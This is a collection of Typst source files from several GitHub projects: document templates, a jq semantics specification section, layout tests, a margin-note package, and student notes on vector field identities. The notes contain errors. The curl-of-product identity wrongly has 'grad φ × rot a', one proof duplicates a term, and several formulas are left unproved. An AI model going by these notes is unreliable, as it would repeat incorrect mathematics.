repo | file | language | license | content
---|---|---|---|---|
https://github.com/tilman151/pypst | https://raw.githubusercontent.com/tilman151/pypst/main/docs/examples/table/my-table.typ | typst | MIT License | #figure(
table(
columns: 3,
stroke: none,
align: (x, _) => if calc.odd(x) {left} else {right},
table.hline(y: 1, stroke: 1.5pt),
table.hline(y: 3, stroke: 1.5pt),
table.header[][Name][Age],
[Los Angeles], [1], [30.0],
[New York], [2], [30.0]
),
caption: "This is my table."
) |
https://github.com/yochem/apa-typst | https://raw.githubusercontent.com/yochem/apa-typst/main/examples/single-author-single-affiliation.typ | typst | #import "../template.typ": apa7
#show: apa7.with(
title: "Example of APA7 Document in Typst",
authors: (
"<NAME>",
),
affiliations: (
"Department of Psychology, George Mason University",
),
)
#lorem(40)
|
|
https://github.com/01mf02/jq-lang-spec | https://raw.githubusercontent.com/01mf02/jq-lang-spec/main/values.typ | typst | #import "common.typ": *
= Values <values>
In this section, we will define values, errors, exceptions, and streams.
While jq was originally limited to operating on JSON values,
we will define the jq semantics for a general value type.
For this value type, there must be a type of numbers and a type of strings, such that
for any number $n$, $n$ is a value, and
for any string $s$, $s$ is a value.
Furthermore, any boolean $top$ (true) or $bot$ (false) must be a value.
By convention, we will write
$v$ for values,
$n$ for numbers, and
$s$ for strings
in the remainder of this text.
Furthermore, the value type must implement a set of operations that will be given in @value-ops.
An _error_ can be constructed from a value by the function $"error"(v)$.
The $"error"$ function is bijective; that is,
if we have an error $e$, then there is a unique value $v$ with $e = "error"(v)$.
In the remainder of this text, we will write just "error"
to denote calling $"error"(v)$ with some value $v$.
This is done such that this specification does not need to fix
the precise error value that is returned when an operation fails.
An _exception_ either is an error or has the shape $"break"(var(x))$.
The latter will become relevant starting from @semantics.
A _value result_ is either a value or an exception.
A _stream_ (or lazy list) is written as $stream(v_0, ..., v_n)$.
The concatenation of two streams $s_1$, $s_2$ is written as $s_1 + s_2$.
Given some stream $l = stream(x_0, ..., x_n)$, we write
$sum_(x in l) f(x)$ to denote $f(x_0) + ... + f(x_n)$.
We use this frequently to map a function over a stream,
by having $f(x)$ return a stream itself.
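To illustrate this notation:
#example[
  Suppose that 1 and 2 are values and let $f(x) = stream(x, x)$.
  Then $sum_(x in stream(1, 2)) f(x) = stream(1, 1) + stream(2, 2) = stream(1, 1, 2, 2)$.
]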
In this text, we will see many functions that take values as arguments.
By convention, for any of these functions $f(v_1, ..., v_n)$,
we extend their domain to value results such that $f(v_1, ..., v_n)$ yields $v_i$
(or rather $stream(v_i)$ if $f$ returns streams)
if $v_i$ is an exception and for all $j < i$, $v_j$ is a value.
For example, in @arithmetic, we will define $l + r$ for values $l$ and $r$,
and by our convention, we extend the domain of addition to value results such that
if $l$ is an exception, then $l + r$ returns just $l$, and
if $l$ is a value, but $r$ is an exception, then $l + r$ returns just $r$.
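To illustrate this convention:
#example[
  Suppose that 1, 2, and 3 are values.
  Then $1 + "error"(2) = "error"(2)$ and $"error"(2) + "error"(3) = "error"(2)$.
]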
== Value operations <value-ops>
In this subsection, we specify the operations that a value type must implement.
There is a total order $<=$ on values.
We say that $v_1 = v_2$ if and only if both $v_1 <= v_2$ and $v_2 <= v_1$.
For JSON values, this order is given in @json-order.
The function $[dot]$ takes a stream of value results
$stream(v_0, ..., v_n)$ and yields a value result.
If there exists an $i$ such that
$v_i$ is an exception and for all $j < i$, $v_j$ is a value, then
$[stream(v_0, ..., v_n)]$ yields the exception $v_i$, otherwise it yields some value.
For JSON values, $[f]$ constructs an array if all elements of $f$ are values,
see @json-construction.
#example[
Suppose that 1, 2, and 3 are values.
Then $[1, "error"(2), "error"(3)] = "error"(2)$.
]
The function ${dot:dot}$ takes a pair of values and yields a value result.
Furthermore, the constant ${}$ yields a value result.
For JSON values, ${s: v}$ constructs a singleton object and ${}$ constructs an empty object,
see @json-construction.
The function $"bool"(v)$ takes a value $v$ and yields a boolean.
If $v in {top, bot}$, then $"bool"(v) = v$.
Let $p$ be a path part (as defined in @syntax) containing values as indices.
The _access operator_ $v[p]$ extracts values contained within $v$ at positions given by $p$,
yielding a stream of value results.
The _update operator_ $v[p]^? update f$ replaces those elements $v' = v[p]$ in $v$ by
the output of $f(v')$, where $f$ is a function from a value to a stream of value results.
The update operator yields a single value result.
If $v[p]$ returns an error, then
$v[p] update f$ should yield an error and
$v[p]? update f$ should yield $v$.
We define $v[p]? = sum_(y in v[p]) cases(
stream( ) & "if" y = "error"(e),
stream(y) & "otherwise",
)$.
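To illustrate:
#example[
  Suppose that 1 and 2 are values and $v[p] = stream(1, "error"(2))$.
  Then $v[p]? = stream(1)$.
]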
The access operator will be used in @semantics, and
the update operator will be used in @updates.
For JSON values,
the access operator is defined in @json-access and
the update operator is defined in @json-update.
|
|
https://github.com/TypstApp-team/typst | https://raw.githubusercontent.com/TypstApp-team/typst/master/tests/typ/layout/pagebreak-parity.typ | typst | Apache License 2.0 | // Test clearing to even or odd pages.
---
#set page(width: 80pt, height: 30pt)
First
#pagebreak(to: "odd")
Third
#pagebreak(to: "even")
Fourth
#pagebreak(to: "even")
Sixth
#pagebreak()
Seventh
#pagebreak(to: "odd")
#page[Ninth]
---
#set page(width: auto, height: auto)
// Test with auto-sized page.
First
#pagebreak(to: "odd")
Third
---
#set page(height: 30pt, width: 80pt)
// Test when content extends to more than one page
First
Second
#pagebreak(to: "odd")
Third
|
https://github.com/icpmoles/politypst | https://raw.githubusercontent.com/icpmoles/politypst/main/aside/acknowledgements.typ | typst | #let acknowledgements = [
#heading(numbering: none)[Acknowledgements]
Here you might want to acknowledge someone.
Lorem ipsum dolor sit amet, consectetur adipiscing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in voluptate velit esse cillum dolore eu fugiat nulla pariatur. Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit anim id est laborum.
] |
|
https://github.com/DashieTM/ost-5semester | https://raw.githubusercontent.com/DashieTM/ost-5semester/main/cyberdef/weeks/week1.typ | typst | #import "../../utils.typ": *
|
|
https://github.com/Treeniks/bachelor-thesis-isabelle-vscode | https://raw.githubusercontent.com/Treeniks/bachelor-thesis-isabelle-vscode/master/template.typ | typst | #let thesis(
title-primary: [],
title-secondary: [],
degree: "",
program: "",
supervisor: "",
advisors: (),
author: "",
start-date: datetime,
submission-date: datetime,
acknowledgements: [],
abstract: [],
appendix: none,
doc,
) = {
set document(title: title-primary, author: author, date: submission-date)
// default
show par: set block(spacing: 1.2em)
show heading: set block(below: 1.6em, above: 2.4em)
// Reference first-level headings as "chapters"
show heading.where(level: 1): set heading(supplement: [Chapter])
show heading.where(level: 1): set text(size: 1.4em)
show heading.where(level: 2): set text(size: 1.2em)
show heading.where(level: 3): set text(size: 1.1em)
show heading.where(level: 4): set text(size: 1.05em)
// Put chapters on new page and add extra spacing
show heading.where(level: 1): it => {
// reset footnote counter
pagebreak(weak: true)
counter(footnote).update(0)
v(3em)
it
}
show figure.caption: set text(size: 0.85em)
show figure.caption: set par(justify: false)
set list(indent: 1em)
set enum(indent: 1em)
show cite.where(form: "prose"): set cite(style: "/association-for-computing-machinery-prose.csl")
set page(margin: (left: 30mm, right: 30mm, top: 40mm, bottom: 40mm))
let cit = upper(text(size: 24pt, [School of Computation,\ Information and Technology\ -- Informatics --]))
let tum = upper(text(size: 14pt, [Technical University of Munich]))
let degree-program = text(size: 16pt, degree + "'s Thesis in " + program)
let title1 = text(weight: "bold", size: 20pt, title-primary)
let title2 = text(weight: "regular", size: 20pt, title-secondary)
// ===== Cover =====
{
set align(center)
image("/resources/tum-logo.svg", width: 30%)
cit
v(0mm)
tum
v(10mm)
degree-program
v(10mm)
title1
v(10mm)
text(size: 16pt, author)
pagebreak(weak: true)
}
// ===== Cover =====
// ===== Title Page =====
{
set align(center)
image("/resources/tum-logo.svg", width: 30%)
cit
v(0mm)
tum
v(10mm)
degree-program
v(10mm)
title1
v(0mm)
title2
v(1fr)
let entries = ()
entries.push(("Author: ", author))
entries.push(("Supervisor: ", supervisor))
if advisors.len() > 0 {
entries.push(("Advisors: ", advisors.join(", ")))
}
entries.push(("Start Date: ", start-date.display("[day].[month].[year]")))
entries.push(("Submission Date: ", submission-date.display("[day].[month].[year]")))
set text(size: 11pt)
grid(
columns: 2,
gutter: 0.6em,
align: (left, left),
..for (term, desc) in entries {
(strong(term), desc)
}
)
pagebreak(weak: true)
}
// ===== Title Page =====
set par(justify: true)
// ===== Disclaimer =====
{
v(1fr)
text("I confirm that this " + lower(degree) + "'s thesis is my own work and I have documented all sources and material used.")
v(3em)
grid(
columns: 2,
gutter: 1fr,
"Munich, " + submission-date.display("[day].[month].[year]"), author,
)
pagebreak(weak: true)
}
// ===== Disclaimer =====
set page(numbering: "i")
set page(margin: (left: 50mm, right: 50mm, top: 40mm, bottom: 60mm))
// ===== Acknowledgement =====
{
show heading: set align(center)
heading("Acknowledgements")
acknowledgements
pagebreak(weak: true)
// ===== Acknowledgement =====
// ===== Abstract =====
heading("Abstract")
abstract
pagebreak(weak: true)
}
// ===== Abstract =====
set page(margin: (left: 30mm, right: 30mm, top: 30mm, bottom: 60mm))
// ===== TOC =====
{
show outline.entry.where(level: 1): it => {
v(2em, weak: true)
link(
it.element.location(),
strong({
it.body
h(1fr)
it.page
}),
)
}
outline(
title: {
text(size: 1.4em, weight: "bold", "Contents")
v(2em)
},
depth: 4,
indent: auto,
)
pagebreak(weak: true)
}
// ===== TOC =====
set heading(numbering: "1.1")
set page(numbering: "1")
counter(page).update(1)
doc
outline(
title: "List of Figures",
target: figure.where(kind: image),
)
outline(
title: "List of Tables",
target: figure.where(kind: table),
)
outline(
title: "List of Listings",
target: figure.where(kind: raw),
)
bibliography("/biblio.bib", style: "association-for-computing-machinery")
// Appendix
if appendix != none {
pagebreak(weak: true)
set heading(numbering: none)
heading(numbering: none)[Appendix]
appendix
}
}
|
|
https://github.com/typst/packages | https://raw.githubusercontent.com/typst/packages/main/packages/preview/drafting/0.1.0/drafting.typ | typst | Apache License 2.0 | #let pos-tracker = state("pos", none)
#let margin-note-defaults = state(
"margin-note-defaults", (margin-right: 0in, margin-left: 0in, stroke: red, side: right, page-width: none, text-kwargs: none)
)
#let absolute-place(dx: 0em, dy: 0em, content) = {
locate(loc => {
let pos = loc.position()
if pos-tracker.at(loc) != none {
pos = pos-tracker.at(loc)
} else {
pos = loc.position()
pos-tracker.update(pos)
}
place(dx: -pos.x + dx, dy: -pos.y + dy, content)
})
pos-tracker.update(none)
}
#let _calc-text-resize-ratio(width, spacing, styles) = {
// Add extra digit to ensure reasonable separation between two adjacent lines
let num-digits = calc.ceil(calc.log(width)) + 1
// M is conventionally the widest character so it should leave enough space if determining
// the scale factor
let dummy-number = "M"
for ii in range(1, num-digits) {
dummy-number += "M"
}
let max-width = measure(text(dummy-number), styles).width
spacing/max-width * 100%
}
#let rule-grid(
color: black,
width: 100cm,
height: 100cm,
spacing: none,
divisions: none,
relative: true,
) = {
// Unfortunately an int cannot be constructed from a length, so get it through a
// hacky method of converting to a string then an int
if spacing == none and divisions == none {
panic("Either `spacing` or `divisions` must be specified")
}
if spacing != none and divisions != none {
panic("Only one of `spacing` or `divisions` can be specified")
}
if divisions != none {
spacing = calc.min(width, height)/divisions
}
let to-int(amt) = int(float(repr(amt.abs).slice(0, -2)))
let x-spacing = spacing
let y-spacing = spacing
if type(spacing) == "sequence" {
x-spacing = spacing.at(0)
y-spacing = spacing.at(1)
}
let width = to-int(width)
let height = to-int(height)
set text(size: spacing, fill: color)
set line(stroke: color)
let place-func = if relative {place} else {absolute-place}
style(styles => {
// text should fit within a spacing rectangle. For now assume it's good enough
// to just check against x dimension
let scale-factor = _calc-text-resize-ratio(width, spacing, styles)
let scaler = scale.with(x: scale-factor, y: scale-factor, origin: top + left)
locate(loc => {
let step = to-int(x-spacing)
for (ii, dx) in range(0, width, step: step).enumerate() {
place-func(
line(start: (dx * 1pt, 0pt), end: (dx * 1pt, height * 1pt))
)
place-func(
dx: dx * 1pt, dy: 1pt,
scaler(repr(ii * step))
)
}
let step = to-int(y-spacing)
for (ii, dy) in range(0, height, step: step).enumerate() {
place-func(line(start: (0pt, dy * 1pt), end: (width * 1pt, dy * 1pt)))
place-func(
dy: dy * 1pt + 1pt, dx: 0pt,
scaler(repr(ii * step))
)
}
})
})
}
#let set-margin-note-defaults(..defaults) = {
margin-note-defaults.update(old => {
for (key, value) in defaults.named().pairs() {
old.insert(key, value)
}
old
})
}
#let set-page-properties(margin-right: 0pt, margin-left: 0pt, ..kwargs) = {
let kwargs = kwargs.named()
// Wrapping in "place" prevents a linebreak from adjusting
// the content
place(
layout(layout-size => {
let update-dict = (
margin-right: margin-right, margin-left: margin-left, page-width: layout-size.width,
)
for (kw, val) in kwargs.pairs() {
update-dict.insert(kw, val)
}
set-margin-note-defaults(..update-dict)
})
)
}
#let margin-lines(stroke: gray + 0.5pt) = {
locate(loc => {
let r-margin = margin-note-defaults.at(loc).margin-right
let l-margin = margin-note-defaults.at(loc).margin-left
place(dx: -2%, rect(height: 100%, width: 104%, stroke: (left: stroke, right: stroke)))
// absolute-place(dx: 100% - l-margin, line(end: (0%, 100%)))
})
}
#let _path-from-diffs(start: (0pt, 0pt), ..diffs) = {
let diffs = diffs.pos()
let out-path = (start, )
let next-pt = start
for diff in diffs {
next-pt = (next-pt.at(0) + diff.at(0), next-pt.at(1) + diff.at(1))
out-path.push(next-pt)
}
out-path
}
#let get-page-pct(loc) = {
let page-width = margin-note-defaults.at(loc).page-width
if page-width == none {
panic("drafting's default `page-width` must be specified and non-zero before creating a note")
}
page-width/100
}
#let _margin-note-right(body, stroke, dy, anchor-x, width, loc) = {
let pct = get-page-pct(loc)
let left-margin = margin-note-defaults.at(loc).margin-left
let dist-to-margin = 101*pct - anchor-x + left-margin
let text-offset = 0.5em
let path-pts = _path-from-diffs(
// make an upward line before coming back down to go all the way to
// the top of the lettering
(0pt, -1em),
(0pt, 1em + text-offset),
(dist-to-margin, 0pt),
(0pt, dy),
(1*pct, 0pt)
)
// Boxing prevents forced paragraph breaks
box[
#place(path(stroke: stroke, ..path-pts))
#place(dx: dist-to-margin + 1*pct, dy: dy + text-offset, rect(stroke: stroke, body, width: width - 4*pct))
]
}
#let _margin-note-left(body, stroke, dy, anchor-x, width, loc) = {
let pct = get-page-pct(loc)
let dist-to-margin = -anchor-x + 1*pct
let text-offset = 0.4em
let box-width = width - 4*pct
let path-pts = _path-from-diffs(
(0pt, -1em),
(0pt, 1em + text-offset),
(-anchor-x + width + 1*pct, 0pt),
(-2*pct, 0pt),
(0pt, dy),
(-1*pct, 0pt),
)
// Boxing prevents forced paragraph breaks
box[
#place(path(stroke: stroke, ..path-pts))
#place(dx: dist-to-margin + 1*pct, dy: dy + text-offset, rect(stroke: stroke, body, width: box-width))
]
}
#let margin-note(body, dy: 0pt, ..kwargs) = {
locate(loc => {
let anchor-x = loc.position().x
let properties = margin-note-defaults.at(loc)
for (kw, val) in kwargs.named().pairs() {
properties.insert(kw, val)
}
set text(..properties.text-kwargs) if properties.text-kwargs != none
if properties.side == right {
_margin-note-right(body, properties.stroke, dy, anchor-x, properties.margin-right, loc)
} else {
_margin-note-left(body, properties.stroke, dy, anchor-x, properties.margin-left, loc)
}
})
}
|
https://github.com/maucejo/cnam_templates | https://raw.githubusercontent.com/maucejo/cnam_templates/main/src/report/_report-utils.typ | typst | MIT License | #import "../common/_colors.typ": *
#import "../common/_utils.typ": *
#let title-page(config-titre) = {
let logo-height = 4.08cm
let decx = 1.5cm
let decy = -1.45cm
if config-titre.composante != "cnam" {
logo-height = 10cm
decx = 1.5cm
decy = -2cm
}
let box-width = 125%
let box-height = 115%
if config-titre.alignement == "center" {
box-width = 107%
box-height = 95%
decx = 0.8cm
}
let tbox = box(fill: primary.light-blue.lighten(60%), width: box-width, height: box-height)[
#set text(font: "Raleway", fill: primary.dark-blue)
#config-titre.titre
]
place(dx: -0.5cm, tbox)
grid(
columns: (1fr, 1fr),
align: (left, right),
[#place(top+left, dx: -0.85cm, dy: -1.45cm, over-title(title: config-titre.surtitre, size: 20pt, color: primary.dark-blue))], [#place(right, dx: decx, dy: decy, image("../resources/logo/" + config-titre.composante + ".png", width: logo-height))]
)
if config-titre.alignement == "center" {
if config-titre.logo != none {
set image(height: 1.75cm)
if type(config-titre.logo) == content {
place(bottom + right, dy: 1.5cm, config-titre.logo)
} else {
let im-grid = {
grid(
columns: config-titre.logo.len(),
column-gutter: 1cm,
align: right+ horizon,
..config-titre.logo.map((logos) => logos)
)
}
place(bottom + right, dy: 1.5cm, im-grid)
}
}
}
pagebreak()
}
#let create_dict(default-dict, user-dict) = {
let new-dict = default-dict
for (key, value) in user-dict {
if key in default-dict.keys() {
new-dict.insert(key, value)
}
}
return new-dict
} |
https://github.com/SnowManKeepsOnForgeting/NoteofFluidMechanics_WuWangyi | https://raw.githubusercontent.com/SnowManKeepsOnForgeting/NoteofFluidMechanics_WuWangyi/main/Chapter_1.typ | typst | Creative Commons Zero v1.0 Universal | #import "@preview/physica:0.9.3": *
#import "@preview/i-figured:0.2.4"
#set heading(numbering: "1.1")
#show math.equation: i-figured.show-equation.with(level: 2)
#show heading: i-figured.reset-counters.with(level: 2)
= Field Theory
== Definition
First, let us define a scalar field $phi$ as $phi = phi(bold(r),t)=phi(x,y,z,t)$ and a vector field $bold(a)$ as $bold(a) = bold(a)(bold(r),t) = bold(a)(x,y,z,t)$.
Then the gradient $op("grad") phi$ of the scalar field $phi$ is
$
op("grad") phi = pdv(phi,x)bold(i) + pdv(phi,y)bold(j) + pdv(phi,z)bold(k)
$
Given a vector field $bold(a)$, choose any point in the field and enclose it in a volume $V$. We define the divergence of the field as:
$
op("div")bold(a) = lim_(V->0) (integral.cont_S bold(a) dot dd(bold(S)))/V
$
By the Ostrogradsky-Gauss formula, we can deduce:
$
op("div") bold(a) = pdv(a_x,x) + pdv(a_y,y) + pdv(a_z,z)
$
We define the projection of the curl of the vector field along a direction $bold(n)$ as:
$
op("rot")_n bold(a) = lim_(S->0)(integral.cont_L bold(a) dot dd(bold(r)))/S
$
where we choose any point in the field and an infinitesimally small closed curve $L$ on the curved surface $S$, whose normal direction coincides with $bold(n)$.
By Stokes' formula, we can deduce:
$
op("rot") bold(a) = mat(delim: "|",
bold(i),bold(j),bold(k);
pdv(,x),pdv(,y),pdv(,z);
a_x,a_y,a_z
)
$
We define the Hamilton operator as:
$
nabla = bold(i)pdv(,x) + bold(j)pdv(,y) + bold(k)pdv(,z)
$
and read it as nabla.
We define the Laplace operator as:
$
laplace = pdv(,x,2) + pdv(,y,2) + pdv(,z,2)
$
== Basic formulas
Let us deduce the basic formulas.
(1) Differentiation formulas
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(phi + psi) = "grad"phi + "grad"psi
$
*Proof*: It follows from the sum rule of differentiation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(phi psi) = psi"grad"phi + phi"grad"psi
$
*Proof*: It follows from the product rule of differentiation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"F(phi) = F'(phi)"grad"phi
$
*Proof*: It follows from the chain rule of differentiation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"bold((a+b)) = "div"bold(a) + "div"bold(b)
$
*Proof*: It follows from the sum rule of differentiation.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt,
)[
$
"div"(phi bold(a)) = phi"div"bold(a) + bold(a)dot"grad"phi
$
*Proof*:
$
"div"(phi bold(a)) = pdv(phi a_x,x) + pdv(phi a_y,y) + pdv(phi a_y,y) = phi"div"bold(a) + bold(a)dot "grad"phi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"(bold(a) times bold(b)) = bold(b)dot "rot"bold(a) - bold(a)dot "rot"bold(b)
$
*Proof*:
$
"div"(bold(a) times bold(b)) &= "div"((a_y b_z - b_y a_z) bold(i) + (a_z b_x - a_x b_z)bold(j) + (b_y a_x - a_y b_x)bold(k))\
&= (a_y pdv(b_z,x) + b_z pdv(a_y,x) - b_y pdv(a_z,x) - a_z pdv(b_y,x))\
&+ (a_z pdv(b_x,y) + b_x pdv(a_z,y) - a_x pdv(b_z,y) - b_z pdv(a_x,y))\
&+ (b_y pdv(a_x,z) + a_x pdv(b_y,z) - a_y pdv(b_x,z) - b_x pdv(a_y,z))\
&= bold(b) dot "rot"bold(a) - bold(a) dot "rot"bold(b)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(bold(a)+bold(b)) = "rot"bold(a) + "rot"bold(b)
$
*Proof*: It is easy to prove.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(phi bold(a)) = phi"rot"bold(a) + "grad"phi times"rot"bold(a)
$
*Proof*: Expand both sides in components and compare.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot"(bold(a) times bold(b)) = (bold(b) dot nabla)bold(a) -(bold(a) dot nabla)bold(b) + bold(a)"div"bold(b) - bold(b)"div"bold(a)
$
*Proof*: We write $bold(a)_c, phi_c$ for a vector and a scalar treated as constant, i.e. not differentiated.
$
"Then" "rot"(bold(a) times bold(b)) &= nabla times (bold(a) times bold(b)) = nabla times (bold(a)_c times bold(b)) + nabla times (bold(a) times bold(b)_c)\
&= bold(a)_c (nabla dot bold(b)) - (bold(a)_c dot nabla)bold(b) + (bold(b)_c dot nabla)bold(a) - bold(b)_c (nabla dot bold(a))\
&=(bold(b) dot nabla)bold(a) - (bold(a)dot nabla)bold(b) + bold(a)"div"bold(b) - bold(b)"div"bold(a)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"(bold(a) dot bold(b)) = (bold(b)dot nabla)bold(a) + (bold(a) dot nabla)bold(b) + bold(b)times "rot"bold(a) + bold(a) times "rot"bold(b)
$<eq18>
*Proof*:
$
"grad"(bold(a) dot bold(b)) &= nabla(bold(a) dot bold(b)) = nabla (bold(a)_c dot bold(b)) + nabla (bold(a) dot bold(b)_c) \
&= bold(a)_c times (nabla times bold(b)) + (bold(a)_c dot nabla)bold(b) + bold(b)_c times (nabla times bold(a)) + (bold(b)_c dot nabla)bold(a)\
&= (bold(b)dot nabla)bold(a) + (bold(a) dot nabla)bold(b) + bold(b)times "rot"bold(a) + bold(a) times "rot"bold(b)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"grad"((a^2)/2) = (bold(a) dot nabla)bold(a) + bold(a) times "rot"bold(a)
$
*Proof*:Substitute $bold(a)$ for $bold(b)$ in @eqt:eq18
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div" "grad"phi = laplace phi
$
*Proof*:
$
"div" "grad"phi = nabla dot nabla phi = nabla^2 phi = laplace phi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div" "rot"bold(a) = 0
$
*Proof*:
$
"div" "rot"bold(a) = nabla dot (nabla times bold(a)) = (nabla times nabla)dot bold(a) = 0
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot" "grad"phi = 0
$
*Proof*:
$
"rot" "grad"phi = nabla times nabla phi = 0
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"rot" "rot"bold(a) = "grad" "div"bold(a) - laplace bold(a)
$
*Proof*:
$
"rot" "rot"bold(a) = nabla times (nabla times bold(a)) = nabla(nabla dot bold(a)) - (nabla dot nabla) bold(a) = "grad" "div"bold(a) - laplace bold(a)
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
"div"(phi "grad"psi) = phi laplace psi + "grad"phi dot "grad"psi
$
*Proof*:
$
"div"(phi "grad"psi) = nabla dot (phi nabla psi) = nabla dot (phi_c nabla psi) + nabla dot (phi nabla psi_c) = phi laplace psi + "grad"phi "grad"psi
$<->
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
laplace(phi psi) = psi laplace phi + phi laplace psi + 2"grad"phi dot "grad"psi
$
*Proof*:
$
laplace(phi psi) = nabla dot nabla(phi psi) = nabla dot (phi nabla psi + psi nabla phi) = psi laplace phi + phi laplace psi + 2"grad"phi dot "grad"psi
$<->
]
(2) Integral formulas
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V"grad"phi dd(V) = integral_S bold(n)phi dd(S)
$
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[Ostrogradsky-Gauss formula
$
integral_V "div"bold(a)dd(V) = integral_S bold(n)dot bold(a)dd(S)
$
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V "rot"bold(a)dd(V) = integral_S bold(n)times bold(a)dd(S)
$
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V (bold(v)dot nabla)bold(a)dd(V) = integral_S (bold(v) dot bold(n) )bold(a) dd(S)
$
$bold(v)$ is a constant vector.
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V laplace phi dd(V) = integral_S pdv(phi,n)dd(S) = integral_S bold(n)dot nabla phi dd(S)
$
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V laplace bold(a) dd(V) = integral_S pdv(bold(a),n)dd(S) = integral_S (bold(n)dot nabla) bold(a) dd(S)
$
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
Green's first formula
$
integral_V (phi laplace psi + "grad"phi dot "grad"psi)dd(V) = integral_S phi pdv(psi,n)dd(S)
$
and $V$ is a simply connected domain.
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
Green's second formula.
$
integral_V (phi laplace psi - psi laplace phi) dd(V) = integral_S (phi pdv(psi,n) - psi pdv(phi,n))dd(S)
$
and $V$ is a simply connected domain.
*Proof*: I have not proved it yet.
]
#block(
fill: luma(230),
inset: 8pt,
radius: 4pt
)[
$
integral_V ("grad"phi)^2 dd(V) = integral_S phi pdv(phi,n)dd(S)
$
and $laplace phi = 0$,$V$ is a simply connected domain.
*Proof*: I have not proved it yet.
]
|
https://github.com/TideDra/seu-thesis-typst | https://raw.githubusercontent.com/TideDra/seu-thesis-typst/main/template.typ | typst | #import "constants.typ": 字体, 字号, 行距
#import "utils.typ": set_doc, set_doc_footnote, part_state
#import "@preview/cuti:0.2.0": show-cn-fakebold
// 论文翻译封面
#let translation_cover(
raw_paper_name: none,
translated_paper_name: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
date: datetime.today().display("[year].[month].[day]"),
) = {
set page(paper: "a4")
set text(font: 字体.宋体, lang: "zh", region: "cn")
align(center)[
#image("figures/logo.png", width: 45%)
#v(-1em)
#text(size: 26pt, font: 字体.黑体)[*本科毕业设计(论文)资料翻译*]
]
v(24pt)
align(right)[
#block(width: 90%, height: 8cm)[
#set align(left)
#set par(leading: 2em)
#text(size: 16pt)[翻译资料名称(外文)\ #raw_paper_name]\
#text(size: 16pt)[翻译资料名称(中文)\ #translated_paper_name]
]
]
align(center)[
#set par(leading: 18pt)
#let info_row(
key,
value,
) = [#key:#h(2.5em)#box(width: 58%, stroke: (bottom: black), outset: 4pt)[#align(center)[#value]]]
#set text(size: 18pt)
#block(width: 80%)[
#info_row([学#h(2em)号], [#student_id])\
#info_row([姓#h(2em)名], [#name])\
#info_row([学#h(2em)院], [#college])\
#info_row([专#h(2em)业], [#major])\
#info_row([指导教师], [#supervisor])\
#info_row([完成日期], [#date])
]
]
}
// 本科毕设封面
#let bachelor_cover(
title: none,
student_id: none,
name: none,
college: none,
major: none,
supervisor: none,
duration: none,
) = {
set page(paper: "a4", margin: (right: 2.4cm, left: 2.4cm, top: 2cm, bottom: 2cm))
show: show-cn-fakebold
set align(center)
v(1.2cm)
image("figures/logo.png", width: 10cm)
v(-0.53cm)
text(font: 字体.黑体, size: 字号.一号, weight: "bold")[本科毕业设计(论文)报告]
v(2.07cm)
let title_array() = {
if type(title)!=array {return (title,)}
else {return title}
}
set text(font: 字体.黑体, size: 22pt)
let underline_entire_line(doc) = {
box(width:100%,stroke: (bottom: 0.5pt), outset: (bottom: 6pt, x: 8pt),underline(stroke: 0.5pt,offset: 6pt,extent:8pt)[#doc])
}
grid(
columns: (2.2cm, 1fr),
gutter: 18pt,
[题#h(0.5em)目: ],
par(leading: 30pt,title_array().map(underline_entire_line).join())
)
v(1.8cm)
set par(justify: true)
set text(font: 字体.宋体, size: 18pt)
grid(
columns: (1.4cm, 5em, 1fr, 1.8cm),
column-gutter: 12pt,
row-gutter: 1.5em,
[],
[学#h(2em)号:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, student_id)],
[],
[],
[姓#h(2em)名:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, name)],
[],
[],
[学#h(2em)院:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, college)],
[],
[],
[专#h(2em)业:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, major)],
[],
[],
[指导教师:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, supervisor)],
[],
[],
[起止日期:],
[#box(stroke: (bottom: 0.5pt), outset: 6pt, width: 100%, duration)],
[],
)
}
// 论文声明页
#let claim_page(year:none,month:none,day:none) = {
